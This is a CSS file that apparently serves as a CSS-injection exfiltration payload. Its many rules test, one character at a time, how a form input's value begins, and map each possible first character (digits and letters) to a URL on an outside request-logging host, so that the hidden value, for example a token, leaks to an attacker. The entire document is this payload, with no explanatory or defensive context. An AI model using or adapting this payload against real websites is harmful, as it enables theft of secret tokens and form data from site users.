
form:has(input[value^="0"]) {
    --value:url("https://toto.requestcatcher.com/0");
}

form:has(input[value^="1"]) {
    --value:url("https://toto.requestcatcher.com/1");
}

form:has(input[value^="2"]) {
    --value:url("https://toto.requestcatcher.com/2");
}

form:has(input[value^="3"]) {
    --value:url("https://toto.requestcatcher.com/3");
}

form:has(input[value^="4"]) {
    --value:url("https://toto.requestcatcher.com/4");
}

form:has(input[value^="5"]) {
    --value:url("https://toto.requestcatcher.com/5");
}

form:has(input[value^="6"]) {
    --value:url("https://toto.requestcatcher.com/6");
}

form:has(input[value^="7"]) {
    --value:url("https://toto.requestcatcher.com/7");
}

form:has(input[value^="8"]) {
    --value:url("https://toto.requestcatcher.com/8");
}

form:has(input[value^="9"]) {
    --value:url("https://toto.requestcatcher.com/9");
}

form:has(input[value^="a"]) {
    --value:url("https://toto.requestcatcher.com/a");
}

form:has(input[value^="b"]) {
    --value:url("https://toto.requestcatcher.com/b");
}

form:has(input[value^="c"]) {
    --value:url("https://toto.requestcatcher.com/c");
}

form:has(input[value^="d"]) {
    --value:url("https://toto.requestcatcher.com/d");
}

form:has(input[value^="e"]) {
    --value:url("https://toto.requestcatcher.com/e");
}

form:has(input[value^="f"]) {
    --value:url("https://toto.requestcatcher.com/f");
}

form:has(input[value^="g"]) {
    --value:url("https://toto.requestcatcher.com/g");
}

form:has(input[value^="h"]) {
    --value:url("https://toto.requestcatcher.com/h");
}

form:has(input[value^="i"]) {
    --value:url("https://toto.requestcatcher.com/i");
}

form:has(input[value^="j"]) {
    --value:url("https://toto.requestcatcher.com/j");
}

form:has(input[value^="k"]) {
    --value:url("https://toto.requestcatcher.com/k");
}

form:has(input[value^="l"]) {
    --value:url("https://toto.requestcatcher.com/l");
}

form:has(input[value^="m"]) {
    --value:url("https://toto.requestcatcher.com/m");
}

form:has(input[value^="n"]) {
    --value:url("https://toto.requestcatcher.com/n");
}

form:has(input[value^="o"]) {
    --value:url("https://toto.requestcatcher.com/o");
}

form:has(input[value^="p"]) {
    --value:url("https://toto.requestcatcher.com/p");
}

form:has(input[value^="q"]) {
    --value:url("https://toto.requestcatcher.com/q");
}

form:has(input[value^="r"]) {
    --value:url("https://toto.requestcatcher.com/r");
}

form:has(input[value^="s"]) {
    --value:url("https://toto.requestcatcher.com/s");
}

form:has(input[value^="t"]) {
    --value:url("https://toto.requestcatcher.com/t");
}

form:has(input[value^="u"]) {
    --value:url("https://toto.requestcatcher.com/u");
}

form:has(input[value^="v"]) {
    --value:url("https://toto.requestcatcher.com/v");
}

form:has(input[value^="w"]) {
    --value:url("https://toto.requestcatcher.com/w");
}

form:has(input[value^="x"]) {
    --value:url("https://toto.requestcatcher.com/x");
}

form:has(input[value^="y"]) {
    --value:url("https://toto.requestcatcher.com/y");
}

form:has(input[value^="z"]) {
    --value:url("https://toto.requestcatcher.com/z");
}

form:has(input[value^="A"]) {
    --value:url("https://toto.requestcatcher.com/A");
}

form:has(input[value^="B"]) {
    --value:url("https://toto.requestcatcher.com/B");
}

form:has(input[value^="C"]) {
    --value:url("https://toto.requestcatcher.com/C");
}

form:has(input[value^="D"]) {
    --value:url("https://toto.requestcatcher.com/D");
}

form:has(input[value^="E"]) {
    --value:url("https://toto.requestcatcher.com/E");
}

form:has(input[value^="F"]) {
    --value:url("https://toto.requestcatcher.com/F");
}

form:has(input[value^="G"]) {
    --value:url("https://toto.requestcatcher.com/G");
}

form:has(input[value^="H"]) {
    --value:url("https://toto.requestcatcher.com/H");
}

form:has(input[value^="I"]) {
    --value:url("https://toto.requestcatcher.com/I");
}

form:has(input[value^="J"]) {
    --value:url("https://toto.requestcatcher.com/J");
}

form:has(input[value^="K"]) {
    --value:url("https://toto.requestcatcher.com/K");
}

form:has(input[value^="L"]) {
    --value:url("https://toto.requestcatcher.com/L");
}

form:has(input[value^="M"]) {
    --value:url("https://toto.requestcatcher.com/M");
}

form:has(input[value^="N"]) {
    --value:url("https://toto.requestcatcher.com/N");
}

form:has(input[value^="O"]) {
    --value:url("https://toto.requestcatcher.com/O");
}

form:has(input[value^="P"]) {
    --value:url("https://toto.requestcatcher.com/P");
}

form:has(input[value^="Q"]) {
    --value:url("https://toto.requestcatcher.com/Q");
}

form:has(input[value^="R"]) {
    --value:url("https://toto.requestcatcher.com/R");
}

form:has(input[value^="S"]) {
    --value:url("https://toto.requestcatcher.com/S");
}

form:has(input[value^="T"]) {
    --value:url("https://toto.requestcatcher.com/T");
}

form:has(input[value^="U"]) {
    --value:url("https://toto.requestcatcher.com/U");
}

form:has(input[value^="V"]) {
    --value:url("https://toto.requestcatcher.com/V");
}

form:has(input[value^="W"]) {
    --value:url("https://toto.requestcatcher.com/W");
}

form:has(input[value^="X"]) {
    --value:url("https://toto.requestcatcher.com/X");
}

form:has(input[value^="Y"]) {
    --value:url("https://toto.requestcatcher.com/Y");
}

form:has(input[value^="Z"]) {
    --value:url("https://toto.requestcatcher.com/Z");
}
